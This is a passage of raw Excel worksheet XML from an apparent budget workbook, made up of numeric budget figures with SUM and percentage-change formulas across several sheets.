      <c r="C7" s="1073"/>
      <c r="D7" s="1022"/>
      <c r="E7" s="1160"/>
      <c r="F7" s="1065"/>
    </row>
    <row r="8" ht="18" customHeight="1" spans="1:6">
      <c r="A8" s="1063" t="s">
        <v>421</v>
      </c>
      <c r="B8" s="775">
        <v>363</v>
      </c>
      <c r="C8" s="1073">
        <v>208</v>
      </c>
      <c r="D8" s="1022">
        <v>341</v>
      </c>
      <c r="E8" s="1160">
        <f t="shared" ref="E7:E30" si="0">IFERROR(D8/C8*100,"-")</f>
        <v>163.942307692308</v>
      </c>
      <c r="F8" s="1065">
        <f t="shared" ref="F7:F30" si="1">IFERROR((D8-B8)/B8*100,"-")</f>
        <v>-6.06060606060606</v>
      </c>
    </row>
    <row r="9" ht="18" customHeight="1" spans="1:6">
      <c r="A9" s="1063" t="s">
        <v>422</v>
      </c>
      <c r="B9" s="775">
        <v>23704</v>
      </c>
      <c r="C9" s="1022">
        <v>17064</v>
      </c>
      <c r="D9" s="1022">
        <v>17600</v>
      </c>
      <c r="E9" s="1160">
        <f t="shared" si="0"/>
        <v>103.141115799344</v>
      </c>
      <c r="F9" s="1065">
        <f t="shared" si="1"/>
        <v>-25.7509281133986</v>
      </c>
    </row>
    <row r="10" ht="18" customHeight="1" spans="1:6">
      <c r="A10" s="1063" t="s">
        <v>423</v>
      </c>
      <c r="B10" s="775">
        <v>117200</v>
      </c>
      <c r="C10" s="1022">
        <v>110451</v>
      </c>
      <c r="D10" s="1022">
        <v>117300</v>
      </c>
      <c r="E10" s="1160">
        <f t="shared" si="0"/>
        <v>106.200939783252</v>
      </c>
      <c r="F10" s="1065">
        <f t="shared" si="1"/>
        <v>0.0853242320819113</v>
      </c>
    </row>
    <row r="11" ht="18" customHeight="1" spans="1:6">
      <c r="A11" s="1063" t="s">
        <v>424</v>
      </c>
      <c r="B11" s="775">
        <v>956</v>
      </c>
      <c r="C11" s="1022">
        <v>862</v>
      </c>
      <c r="D11" s="1022">
        <v>884</v>
      </c>
      <c r="E11" s="1160">
        <f t="shared" si="0"/>
        <v>102.552204176334</v>
      </c>
      <c r="F11" s="1065">
        <f t="shared" si="1"/>
        <v>-7.53138075313808</v>
      </c>
    </row>
    <row r="12" ht="18" customHeight="1" spans="1:6">
      <c r="A12" s="1063" t="s">
        <v>425</v>
      </c>
      <c r="B12" s="775">
        <v>3725</v>
      </c>
      <c r="C12" s="1022">
        <v>3021</v>
      </c>
      <c r="D12" s="1022">
        <v>3447</v>
      </c>
      <c r="E12" s="1160">
        <f t="shared" si="0"/>
        <v>114.101290963257</v>
      </c>
      <c r="F12" s="1065">
        <f t="shared" si="1"/>
        <v>-7.46308724832215</v>
      </c>
    </row>
    <row r="13" ht="18" customHeight="1" spans="1:6">
      <c r="A13" s="1063" t="s">
        <v>426</v>
      </c>
      <c r="B13" s="775">
        <v>106799</v>
      </c>
      <c r="C13" s="1022">
        <v>111693</v>
      </c>
      <c r="D13" s="1022">
        <v>111911</v>
      </c>
      <c r="E13" s="1160">
        <f t="shared" si="0"/>
        <v>100.195177853581</v>
      </c>
      <c r="F13" s="1065">
        <f t="shared" si="1"/>
        <v>4.78656167192577</v>
      </c>
    </row>
    <row r="14" ht="18" customHeight="1" spans="1:6">
      <c r="A14" s="1063" t="s">
        <v>427</v>
      </c>
      <c r="B14" s="775">
        <v>36202</v>
      </c>
      <c r="C14" s="1022">
        <v>41641</v>
      </c>
      <c r="D14" s="1022">
        <v>42613</v>
      </c>
      <c r="E14" s="1160">
        <f t="shared" si="0"/>
        <v>102.334237890541</v>
      </c>
      <c r="F14" s="1065">
        <f t="shared" si="1"/>
        <v>17.70896635545</v>
      </c>
    </row>
    <row r="15" ht="18" customHeight="1" spans="1:6">
      <c r="A15" s="1063" t="s">
        <v>428</v>
      </c>
      <c r="B15" s="775">
        <v>3249</v>
      </c>
      <c r="C15" s="1022">
        <v>3116</v>
      </c>
      <c r="D15" s="1022">
        <v>3393</v>
      </c>
      <c r="E15" s="1160">
        <f t="shared" si="0"/>
        <v>108.889602053915</v>
      </c>
      <c r="F15" s="1065">
        <f t="shared" si="1"/>
        <v>4.43213296398892</v>
      </c>
    </row>
    <row r="16" ht="18" customHeight="1" spans="1:6">
      <c r="A16" s="1063" t="s">
        <v>429</v>
      </c>
      <c r="B16" s="775">
        <v>10626</v>
      </c>
      <c r="C16" s="1022">
        <v>29995</v>
      </c>
      <c r="D16" s="1022">
        <v>40421</v>
      </c>
      <c r="E16" s="1160">
        <f t="shared" si="0"/>
        <v>134.759126521087</v>
      </c>
      <c r="F16" s="1065">
        <f t="shared" si="1"/>
        <v>280.397139092791</v>
      </c>
    </row>
    <row r="17" ht="18" customHeight="1" spans="1:6">
      <c r="A17" s="1063" t="s">
        <v>430</v>
      </c>
      <c r="B17" s="775">
        <v>45000</v>
      </c>
      <c r="C17" s="1022">
        <v>40194</v>
      </c>
      <c r="D17" s="1022">
        <v>41030</v>
      </c>
      <c r="E17" s="1160">
        <f t="shared" si="0"/>
        <v>102.07991242474</v>
      </c>
      <c r="F17" s="1065">
        <f t="shared" si="1"/>
        <v>-8.82222222222222</v>
      </c>
    </row>
    <row r="18" ht="18" customHeight="1" spans="1:6">
      <c r="A18" s="1063" t="s">
        <v>431</v>
      </c>
      <c r="B18" s="775">
        <v>6845</v>
      </c>
      <c r="C18" s="1022">
        <v>5454</v>
      </c>
      <c r="D18" s="1022">
        <v>5664</v>
      </c>
      <c r="E18" s="1160">
        <f t="shared" si="0"/>
        <v>103.850385038504</v>
      </c>
      <c r="F18" s="1065">
        <f t="shared" si="1"/>
        <v>-17.2534696859021</v>
      </c>
    </row>
    <row r="19" ht="18" customHeight="1" spans="1:6">
      <c r="A19" s="1063" t="s">
        <v>432</v>
      </c>
      <c r="B19" s="775">
        <v>18876</v>
      </c>
      <c r="C19" s="1022">
        <v>1448</v>
      </c>
      <c r="D19" s="1022">
        <v>2230</v>
      </c>
      <c r="E19" s="1160">
        <f t="shared" si="0"/>
        <v>154.005524861878</v>
      </c>
      <c r="F19" s="1065">
        <f t="shared" si="1"/>
        <v>-88.1860563678746</v>
      </c>
    </row>
    <row r="20" ht="18" customHeight="1" spans="1:6">
      <c r="A20" s="1063" t="s">
        <v>433</v>
      </c>
      <c r="B20" s="775">
        <v>452</v>
      </c>
      <c r="C20" s="1022">
        <v>1053</v>
      </c>
      <c r="D20" s="1022">
        <v>1163</v>
      </c>
      <c r="E20" s="1160">
        <f t="shared" si="0"/>
        <v>110.446343779677</v>
      </c>
      <c r="F20" s="1065">
        <f t="shared" si="1"/>
        <v>157.300884955752</v>
      </c>
    </row>
    <row r="21" ht="18" customHeight="1" spans="1:6">
      <c r="A21" s="1063" t="s">
        <v>434</v>
      </c>
      <c r="B21" s="775">
        <v>570</v>
      </c>
      <c r="C21" s="1022">
        <v>70</v>
      </c>
      <c r="D21" s="1022">
        <v>165</v>
      </c>
      <c r="E21" s="1160">
        <f t="shared" si="0"/>
        <v>235.714285714286</v>
      </c>
      <c r="F21" s="1065">
        <f t="shared" si="1"/>
        <v>-71.0526315789474</v>
      </c>
    </row>
    <row r="22" ht="18" customHeight="1" spans="1:6">
      <c r="A22" s="1063" t="s">
        <v>435</v>
      </c>
      <c r="B22" s="775">
        <v>932</v>
      </c>
      <c r="C22" s="1022">
        <v>932</v>
      </c>
      <c r="D22" s="1022">
        <v>932</v>
      </c>
      <c r="E22" s="1160">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F22" s="1065">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="18" customHeight="1" spans="1:6">
      <c r="A23" s="1063" t="s">
        <v>436</v>
      </c>
      <c r="B23" s="775">
        <v>4030</v>
      </c>
      <c r="C23" s="1022">
        <v>4600</v>
      </c>
      <c r="D23" s="1022">
        <v>4663</v>
      </c>
      <c r="E23" s="1160">
        <f t="shared" si="0"/>
        <v>101.369565217391</v>
      </c>
      <c r="F23" s="1065">
        <f t="shared" si="1"/>
        <v>15.7071960297767</v>
      </c>
    </row>
    <row r="24" ht="18" customHeight="1" spans="1:6">
      <c r="A24" s="1063" t="s">
        <v>437</v>
      </c>
      <c r="B24" s="775">
        <v>15089</v>
      </c>
      <c r="C24" s="1022">
        <v>18736</v>
      </c>
      <c r="D24" s="1022">
        <v>10893</v>
      </c>
      <c r="E24" s="1160">
        <f t="shared" si="0"/>
        <v>58.1394107600342</v>
      </c>
      <c r="F24" s="1065">
        <f t="shared" si="1"/>
        <v>-27.8083371992842</v>
      </c>
    </row>
    <row r="25" ht="18" customHeight="1" spans="1:6">
      <c r="A25" s="1063" t="s">
        <v>438</v>
      </c>
      <c r="B25" s="775">
        <v>301</v>
      </c>
      <c r="C25" s="1022">
        <v>182</v>
      </c>
      <c r="D25" s="1022">
        <v>182</v>
      </c>
      <c r="E25" s="1160">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F25" s="1065">
        <f t="shared" si="1"/>
        <v>-39.5348837209302</v>
      </c>
    </row>
    <row r="26" ht="18" customHeight="1" spans="1:6">
      <c r="A26" s="1063" t="s">
        <v>439</v>
      </c>
      <c r="B26" s="775">
        <v>3493</v>
      </c>
      <c r="C26" s="1022">
        <v>3306</v>
      </c>
      <c r="D26" s="1022">
        <v>3529</v>
      </c>
      <c r="E26" s="1160">
        <f t="shared" si="0"/>
        <v>106.745311554749</v>
      </c>
      <c r="F26" s="1065">
        <f t="shared" si="1"/>
        <v>1.03063269395935</v>
      </c>
    </row>
    <row r="27" ht="18" customHeight="1" spans="1:6">
      <c r="A27" s="1063" t="s">
        <v>440</v>
      </c>
      <c r="B27" s="775"/>
      <c r="C27" s="1073"/>
      <c r="D27" s="1022"/>
      <c r="E27" s="1160"/>
      <c r="F27" s="1065"/>
    </row>
    <row r="28" ht="18" customHeight="1" spans="1:6">
      <c r="A28" s="1063" t="s">
        <v>441</v>
      </c>
      <c r="B28" s="775">
        <v>4806</v>
      </c>
      <c r="C28" s="1073">
        <v>4467</v>
      </c>
      <c r="D28" s="1022">
        <v>4467</v>
      </c>
      <c r="E28" s="1160">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="F28" s="1065">
        <f t="shared" si="1"/>
        <v>-7.05368289637953</v>
      </c>
    </row>
    <row r="29" ht="18" customHeight="1" spans="1:6">
      <c r="A29" s="1063" t="s">
        <v>442</v>
      </c>
      <c r="B29" s="775"/>
      <c r="C29" s="1073"/>
      <c r="D29" s="1022"/>
      <c r="E29" s="1160"/>
      <c r="F29" s="1065"/>
    </row>
    <row r="30" ht="18" customHeight="1" spans="1:6">
      <c r="A30" s="1063" t="s">
        <v>443</v>
      </c>
      <c r="B30" s="775">
        <v>20544</v>
      </c>
      <c r="C30" s="1073">
        <v>18202</v>
      </c>
      <c r="D30" s="1022">
        <v>6312</v>
      </c>
      <c r="E30" s="1160">
        <f t="shared" si="0"/>
        <v>34.6775079661576</v>
      </c>
      <c r="F30" s="1065">
        <f t="shared" si="1"/>
        <v>-69.2757009345794</v>
      </c>
    </row>
    <row r="31" ht="18" customHeight="1" spans="1:6">
      <c r="A31" s="1067" t="s">
        <v>444</v>
      </c>
      <c r="B31" s="1161">
        <f>SUM(B6:B30)</f>
        <v>470336</v>
      </c>
      <c r="C31" s="1068">
        <f>SUM(C6:C30)</f>
        <v>464189</v>
      </c>
      <c r="D31" s="1067">
        <f>SUM(D6:D30)</f>
        <v>464239</v>
      </c>
      <c r="E31" s="1162">
        <f t="shared" ref="E28:E35" si="2">IFERROR(D31/C31*100,"-")</f>
        <v>100.01077147455</v>
      </c>
      <c r="F31" s="1070">
        <f t="shared" ref="F28:F33" si="3">IFERROR((D31-B31)/B31*100,"-")</f>
        <v>-1.29630732072391</v>
      </c>
    </row>
    <row r="32" ht="18" customHeight="1" spans="1:6">
      <c r="A32" s="1063" t="s">
        <v>445</v>
      </c>
      <c r="B32" s="1163">
        <f>SUM(B33:B34)</f>
        <v>23560</v>
      </c>
      <c r="C32" s="1163">
        <f>SUM(C33:C34)</f>
        <v>7729</v>
      </c>
      <c r="D32" s="1163">
        <f>SUM(D33:D34)</f>
        <v>7729</v>
      </c>
      <c r="E32" s="1160">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="F32" s="1065">
        <f t="shared" si="3"/>
        <v>-67.1943972835314</v>
      </c>
    </row>
    <row r="33" ht="18" customHeight="1" spans="1:6">
      <c r="A33" s="1072" t="s">
        <v>446</v>
      </c>
      <c r="B33" s="1163">
        <v>2480</v>
      </c>
      <c r="C33" s="1073">
        <v>589</v>
      </c>
      <c r="D33" s="1022">
        <v>589</v>
      </c>
      <c r="E33" s="1160">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="F33" s="1065">
        <f t="shared" si="3"/>
        <v>-76.25</v>
      </c>
    </row>
    <row r="34" ht="18" customHeight="1" spans="1:6">
      <c r="A34" s="1072" t="s">
        <v>447</v>
      </c>
      <c r="B34" s="1163">
        <v>21080</v>
      </c>
      <c r="C34" s="1073">
        <v>7140</v>
      </c>
      <c r="D34" s="1022">
        <v>7140</v>
      </c>
      <c r="E34" s="1160">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="F34" s="1065">
        <f t="shared" ref="F34:F38" si="4">IFERROR((D34-B34)/B34*100,"-")</f>
        <v>-66.1290322580645</v>
      </c>
    </row>
    <row r="35" ht="18" customHeight="1" spans="1:6">
      <c r="A35" s="1063" t="s">
        <v>448</v>
      </c>
      <c r="B35" s="1163">
        <f>SUM(B36:B40)</f>
        <v>85781</v>
      </c>
      <c r="C35" s="1163">
        <f>SUM(C36:C40)</f>
        <v>88024</v>
      </c>
      <c r="D35" s="1163">
        <f>SUM(D36:D40)</f>
        <v>83612</v>
      </c>
      <c r="E35" s="1160">
        <f t="shared" si="2"/>
        <v>94.9877306189221</v>
      </c>
      <c r="F35" s="1065">
        <f t="shared" si="4"/>
        <v>-2.52853195929168</v>
      </c>
    </row>
    <row r="36" ht="18" customHeight="1" spans="1:6">
      <c r="A36" s="1072" t="s">
        <v>449</v>
      </c>
      <c r="B36" s="1163"/>
      <c r="C36" s="1073"/>
      <c r="D36" s="1022"/>
      <c r="E36" s="1160"/>
      <c r="F36" s="1065"/>
    </row>
    <row r="37" ht="18" customHeight="1" spans="1:6">
      <c r="A37" s="1072" t="s">
        <v>450</v>
      </c>
      <c r="B37" s="1163">
        <v>72258</v>
      </c>
      <c r="C37" s="1071">
        <v>83024</v>
      </c>
      <c r="D37" s="1022">
        <v>77620</v>
      </c>
      <c r="E37" s="1160">
        <f>IFERROR(D37/C37*100,"-")</f>
        <v>93.4910387357872</v>
      </c>
      <c r="F37" s="1065">
        <f>IFERROR((D37-B37)/B37*100,"-")</f>
        <v>7.42063162556395</v>
      </c>
    </row>
    <row r="38" ht="18" customHeight="1" spans="1:6">
      <c r="A38" s="1072" t="s">
        <v>451</v>
      </c>
      <c r="B38" s="1163">
        <v>5489</v>
      </c>
      <c r="C38" s="1071"/>
      <c r="D38" s="1022"/>
      <c r="E38" s="1160"/>
      <c r="F38" s="1065">
        <f>IFERROR((D38-B38)/B38*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="39" ht="18" customHeight="1" spans="1:6">
      <c r="A39" s="1072" t="s">
        <v>452</v>
      </c>
      <c r="B39" s="1163"/>
      <c r="C39" s="1071"/>
      <c r="D39" s="1022"/>
      <c r="E39" s="1160"/>
      <c r="F39" s="1065"/>
    </row>
    <row r="40" ht="18" customHeight="1" spans="1:6">
      <c r="A40" s="1072" t="s">
        <v>453</v>
      </c>
      <c r="B40" s="1163">
        <v>8034</v>
      </c>
      <c r="C40" s="1164">
        <v>5000</v>
      </c>
      <c r="D40" s="1022">
        <v>5992</v>
      </c>
      <c r="E40" s="1160">
        <f>IFERROR(D40/C40*100,"-")</f>
        <v>119.84</v>
      </c>
      <c r="F40" s="1065">
        <f>IFERROR((D40-B40)/B40*100,"-")</f>
        <v>-25.4169778441623</v>
      </c>
    </row>
    <row r="41" ht="18" customHeight="1" spans="1:6">
      <c r="A41" s="984" t="s">
        <v>454</v>
      </c>
      <c r="B41" s="781">
        <f>B31+B32+B35</f>
        <v>579677</v>
      </c>
      <c r="C41" s="1165">
        <f>SUM(C31,C32,C35)</f>
        <v>559942</v>
      </c>
      <c r="D41" s="984">
        <f>SUM(D31,D32,D35)</f>
        <v>555580</v>
      </c>
      <c r="E41" s="1166">
        <f>IFERROR(D41/C41*100,"-")</f>
        <v>99.2209907454701</v>
      </c>
      <c r="F41" s="1080">
        <f>IFERROR((D41-B41)/B41*100,"-")</f>
        <v>-4.15697017476974</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.708661417322835" right="0.708661417322835" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:C34"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScale="130" zoomScaleNormal="100" zoomScaleSheetLayoutView="130" workbookViewId="0">
      <pane xSplit="1" ySplit="7" topLeftCell="B26" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="E9" sqref="E9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.2" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="57.4259259259259" style="238" customWidth="1"/>
    <col min="2" max="3" width="13.8425925925926" style="263" customWidth="1"/>
    <col min="4" max="16384" width="9" style="238"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:3">
      <c r="A1" s="186" t="s">
        <v>2277</v>
      </c>
      <c r="B1" s="264"/>
      <c r="C1" s="264"/>
    </row>
    <row r="2" ht="24" spans="1:3">
      <c r="A2" s="265" t="s">
        <v>2278</v>
      </c>
      <c r="B2" s="265"/>
      <c r="C2" s="265"/>
    </row>
    <row r="3" ht="14.4" spans="1:3">
      <c r="A3" s="240"/>
      <c r="B3" s="264"/>
      <c r="C3" s="266" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="25.7" customHeight="1" spans="1:3">
      <c r="A4" s="267" t="s">
        <v>703</v>
      </c>
      <c r="B4" s="267" t="s">
        <v>378</v>
      </c>
      <c r="C4" s="267" t="s">
        <v>2279</v>
      </c>
    </row>
    <row r="5" ht="26" customHeight="1" spans="1:3">
      <c r="A5" s="268" t="s">
        <v>704</v>
      </c>
      <c r="B5" s="269">
        <f>B6+B13+B16+B20+B21+B27+B28+B29+B30+B34</f>
        <v>140500</v>
      </c>
      <c r="C5" s="270">
        <f>B5/B5</f>
        <v>1</v>
      </c>
    </row>
    <row r="6" ht="18" customHeight="1" spans="1:3">
      <c r="A6" s="271" t="s">
        <v>2280</v>
      </c>
      <c r="B6" s="272">
        <f>SUM(B7:B12)</f>
        <v>3800</v>
      </c>
      <c r="C6" s="273">
        <f>B6/B5</f>
        <v>0.0270462633451957</v>
      </c>
    </row>
    <row r="7" ht="18" customHeight="1" spans="1:3">
      <c r="A7" s="274" t="s">
        <v>2281</v>
      </c>
      <c r="B7" s="248"/>
      <c r="C7" s="275"/>
    </row>
    <row r="8" ht="18" customHeight="1" spans="1:3">
      <c r="A8" s="274" t="s">
        <v>2282</v>
      </c>
      <c r="B8" s="248"/>
      <c r="C8" s="276"/>
    </row>
    <row r="9" ht="18" customHeight="1" spans="1:3">
      <c r="A9" s="274" t="s">
        <v>2283</v>
      </c>
      <c r="B9" s="248"/>
      <c r="C9" s="275"/>
    </row>
    <row r="10" ht="18" customHeight="1" spans="1:3">
      <c r="A10" s="274" t="s">
        <v>2284</v>
      </c>
      <c r="B10" s="248"/>
      <c r="C10" s="275"/>
    </row>
    <row r="11" ht="18" customHeight="1" spans="1:3">
      <c r="A11" s="274" t="s">
        <v>2285</v>
      </c>
      <c r="B11" s="248"/>
      <c r="C11" s="275"/>
    </row>
    <row r="12" ht="18" customHeight="1" spans="1:3">
      <c r="A12" s="274" t="s">
        <v>2286</v>
      </c>
      <c r="B12" s="248">
        <v>3800</v>
      </c>
      <c r="C12" s="275">
        <f>B12/B5</f>
        <v>0.0270462633451957</v>
      </c>
    </row>
    <row r="13" ht="18" customHeight="1" spans="1:3">
      <c r="A13" s="271" t="s">
        <v>2287</v>
      </c>
      <c r="B13" s="277"/>
      <c r="C13" s="278"/>
    </row>
    <row r="14" ht="18" customHeight="1" spans="1:3">
      <c r="A14" s="274" t="s">
        <v>2288</v>
      </c>
      <c r="B14" s="248"/>
      <c r="C14" s="276"/>
    </row>
    <row r="15" ht="18" customHeight="1" spans="1:3">
      <c r="A15" s="274" t="s">
        <v>2289</v>
      </c>
      <c r="B15" s="248"/>
      <c r="C15" s="276"/>
    </row>
    <row r="16" ht="18" customHeight="1" spans="1:3">
      <c r="A16" s="271" t="s">
        <v>2290</v>
      </c>
      <c r="B16" s="277">
        <f>B17+B18+B19</f>
        <v>30900</v>
      </c>
      <c r="C16" s="273">
        <f>B16/B5</f>
        <v>0.219928825622776</v>
      </c>
    </row>
    <row r="17" ht="18" customHeight="1" spans="1:3">
      <c r="A17" s="274" t="s">
        <v>2291</v>
      </c>
      <c r="B17" s="248">
        <v>1500</v>
      </c>
      <c r="C17" s="275">
        <f>B17/B5</f>
        <v>0.0106761565836299</v>
      </c>
    </row>
    <row r="18" ht="18" customHeight="1" spans="1:3">
      <c r="A18" s="274" t="s">
        <v>2292</v>
      </c>
      <c r="B18" s="248">
        <v>29400</v>
      </c>
      <c r="C18" s="275">
        <f>B18/B5</f>
        <v>0.209252669039146</v>
      </c>
    </row>
    <row r="19" ht="18" customHeight="1" spans="1:3">
      <c r="A19" s="274" t="s">
        <v>2293</v>
      </c>
      <c r="B19" s="248"/>
      <c r="C19" s="275"/>
    </row>
    <row r="20" ht="18" customHeight="1" spans="1:3">
      <c r="A20" s="271" t="s">
        <v>2294</v>
      </c>
      <c r="B20" s="277">
        <v>25300</v>
      </c>
      <c r="C20" s="273">
        <f>B20/B5</f>
        <v>0.180071174377224</v>
      </c>
    </row>
    <row r="21" ht="18" customHeight="1" spans="1:3">
      <c r="A21" s="271" t="s">
        <v>2295</v>
      </c>
      <c r="B21" s="277"/>
      <c r="C21" s="273"/>
    </row>
    <row r="22" ht="18" customHeight="1" spans="1:3">
      <c r="A22" s="274" t="s">
        <v>2296</v>
      </c>
      <c r="B22" s="248"/>
      <c r="C22" s="275"/>
    </row>
    <row r="23" ht="18" customHeight="1" spans="1:3">
      <c r="A23" s="274" t="s">
        <v>2297</v>
      </c>
      <c r="B23" s="248"/>
      <c r="C23" s="275"/>
    </row>
    <row r="24" ht="18" customHeight="1" spans="1:3">
      <c r="A24" s="274" t="s">
        <v>2298</v>
      </c>
      <c r="B24" s="248"/>
      <c r="C24" s="275"/>
    </row>
    <row r="25" ht="18" customHeight="1" spans="1:3">
      <c r="A25" s="274" t="s">
        <v>2299</v>
      </c>
      <c r="B25" s="248"/>
      <c r="C25" s="275"/>
    </row>
    <row r="26" ht="18" customHeight="1" spans="1:3">
      <c r="A26" s="274" t="s">
        <v>2300</v>
      </c>
      <c r="B26" s="248"/>
      <c r="C26" s="275"/>
    </row>
    <row r="27" ht="18" customHeight="1" spans="1:3">
      <c r="A27" s="271" t="s">
        <v>2301</v>
      </c>
      <c r="B27" s="277">
        <v>43400</v>
      </c>
      <c r="C27" s="273">
        <f>B27/B5</f>
        <v>0.308896797153025</v>
      </c>
    </row>
    <row r="28" ht="18" customHeight="1" spans="1:3">
      <c r="A28" s="271" t="s">
        <v>2302</v>
      </c>
      <c r="B28" s="277">
        <v>18600</v>
      </c>
      <c r="C28" s="273">
        <f>B28/B5</f>
        <v>0.132384341637011</v>
      </c>
    </row>
    <row r="29" ht="18" customHeight="1" spans="1:3">
      <c r="A29" s="271" t="s">
        <v>2303</v>
      </c>
      <c r="B29" s="277"/>
      <c r="C29" s="278"/>
    </row>
    <row r="30" ht="18" customHeight="1" spans="1:3">
      <c r="A30" s="271" t="s">
        <v>2304</v>
      </c>
      <c r="B30" s="277">
        <f>B31+B32+B33</f>
        <v>2500</v>
      </c>
      <c r="C30" s="273">
        <f>B30/B5</f>
        <v>0.0177935943060498</v>
      </c>
    </row>
    <row r="31" ht="18" customHeight="1" spans="1:3">
      <c r="A31" s="274" t="s">
        <v>2305</v>
      </c>
      <c r="B31" s="248"/>
      <c r="C31" s="275"/>
    </row>
    <row r="32" ht="18" customHeight="1" spans="1:3">
      <c r="A32" s="274" t="s">
        <v>2306</v>
      </c>
      <c r="B32" s="248"/>
      <c r="C32" s="275"/>
    </row>
    <row r="33" ht="18" customHeight="1" spans="1:3">
      <c r="A33" s="274" t="s">
        <v>2307</v>
      </c>
      <c r="B33" s="248">
        <v>2500</v>
      </c>
      <c r="C33" s="275">
        <f>B33/B5</f>
        <v>0.0177935943060498</v>
      </c>
    </row>
    <row r="34" ht="18" customHeight="1" spans="1:3">
      <c r="A34" s="279" t="s">
        <v>2308</v>
      </c>
      <c r="B34" s="280">
        <v>16000</v>
      </c>
      <c r="C34" s="281">
        <f>B34/B5</f>
        <v>0.113879003558719</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:C2"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:G37"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScale="115" zoomScaleNormal="100" zoomScaleSheetLayoutView="115" workbookViewId="0">
      <pane xSplit="1" ySplit="1" topLeftCell="B18" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A25" sqref="A25:A35"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.2" outlineLevelCol="6"/>
  <cols>
    <col min="1" max="2" width="13.5740740740741" style="238" customWidth="1"/>
    <col min="3" max="3" width="16.5740740740741" style="238" customWidth="1"/>
    <col min="4" max="4" width="9.72222222222222" style="238" customWidth="1"/>
    <col min="5" max="5" width="13.5740740740741" style="238" customWidth="1"/>
    <col min="6" max="6" width="15" style="238" customWidth="1"/>
    <col min="7" max="7" width="10.8148148148148" style="238" customWidth="1"/>
    <col min="8" max="16384" width="9" style="238"/>
  </cols>
  <sheetData>
    <row r="1" s="238" customFormat="1" ht="17.4" spans="1:7">
      <c r="A1" s="239" t="s">
        <v>2309</v>
      </c>
      <c r="B1" s="240"/>
      <c r="C1" s="240"/>
      <c r="D1" s="240"/>
      <c r="E1" s="240"/>
      <c r="F1" s="240"/>
      <c r="G1" s="240"/>
    </row>
    <row r="2" s="238" customFormat="1" ht="25.8" spans="1:7">
      <c r="A2" s="241" t="s">
        <v>2310</v>
      </c>
      <c r="B2" s="241"/>
      <c r="C2" s="241"/>
      <c r="D2" s="241"/>
      <c r="E2" s="241"/>
      <c r="F2" s="241"/>
      <c r="G2" s="241"/>
    </row>
    <row r="3" s="238" customFormat="1" ht="14.4" spans="1:7">
      <c r="A3" s="240"/>
      <c r="B3" s="240"/>
      <c r="C3" s="240"/>
      <c r="D3" s="240"/>
      <c r="E3" s="240"/>
      <c r="F3" s="240"/>
      <c r="G3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="238" customFormat="1" ht="23.1" customHeight="1" spans="1:7">
      <c r="A4" s="242" t="s">
        <v>2239</v>
      </c>
      <c r="B4" s="242" t="s">
        <v>2311</v>
      </c>
      <c r="C4" s="243" t="s">
        <v>2312</v>
      </c>
      <c r="D4" s="243" t="s">
        <v>2313</v>
      </c>
      <c r="E4" s="243" t="s">
        <v>2314</v>
      </c>
      <c r="F4" s="243" t="s">
        <v>2315</v>
      </c>
      <c r="G4" s="243" t="s">
        <v>2316</v>
      </c>
    </row>
    <row r="5" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A5" s="244" t="s">
        <v>2249</v>
      </c>
      <c r="B5" s="244"/>
      <c r="C5" s="244"/>
      <c r="D5" s="244"/>
      <c r="E5" s="244"/>
      <c r="F5" s="245">
        <f>F6+F25</f>
        <v>206640</v>
      </c>
      <c r="G5" s="246"/>
    </row>
    <row r="6" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A6" s="247" t="s">
        <v>2317</v>
      </c>
      <c r="B6" s="244" t="s">
        <v>2318</v>
      </c>
      <c r="C6" s="244"/>
      <c r="D6" s="244"/>
      <c r="E6" s="244"/>
      <c r="F6" s="245">
        <f>SUM(F7:F24)</f>
        <v>140500</v>
      </c>
      <c r="G6" s="246"/>
    </row>
    <row r="7" s="238" customFormat="1" ht="15.95" customHeight="1" spans="1:7">
      <c r="A7" s="248"/>
      <c r="B7" s="249">
        <v>45726</v>
      </c>
      <c r="C7" s="247" t="s">
        <v>2254</v>
      </c>
      <c r="D7" s="250">
        <v>30</v>
      </c>
      <c r="E7" s="251">
        <v>0.0225</v>
      </c>
      <c r="F7" s="252">
        <v>18000</v>
      </c>
      <c r="G7" s="253"/>
    </row>
